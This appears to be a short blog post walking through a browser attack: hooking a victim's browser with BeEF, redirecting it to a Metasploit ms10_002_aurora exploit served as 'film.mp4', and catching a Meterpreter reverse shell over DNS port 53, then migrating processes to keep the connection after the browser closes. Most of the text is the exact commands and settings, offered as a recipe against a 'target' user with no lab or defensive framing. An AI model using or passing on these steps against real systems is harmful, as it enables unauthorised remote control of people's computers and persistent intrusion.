1. Turn on Beef that has been available in Linux,then on the webpage beef insert your login data
3. Open a web that has been inserted script, this is done as if we as a user with access to the web.
4. Having access to the web, the user will be connected to the beef that we run.
5. Select one of the commands that we need are already available.
6. Open a command terminal, run metasploit by typing the consequence of the following:
# msfconsole
7. Locate the module that will be used for exploid made in accordance with the browser in use by the target.
8. Select one of the modules that will be used, here I will use the module aurora,
# Use exploit windows / browser / ms10_002_aurora
9. Setting the server host, server ports, and URIPATH which we will send to the target, are in use with the command:
# Set SRVHOST 192.168.56.1
# Set SRVPORT 8080
# set URIPATH film.mp4
10. Setting payload, LHOST and dns port that we use for us to send it to the target by typing the command:
# Set payload windows / meterpreter / reverse_tcp_dns
# Set LHOST 192.168.56.1
# Set LPORT 53
11. Then run the exploit
12. Copy the url address that is given,copy the address and input to Redirect Browser on Beef, this will force toward the user's browser to a web page that we have prepared.
13. After the user's browser redirect to the url that we insert the payload, then immediately do migrate to an application running on a user's system when the user closes the browser so that we stay connected.
14. Now we have to be in the target's operating system.
Tidak ada komentar:
Posting Komentar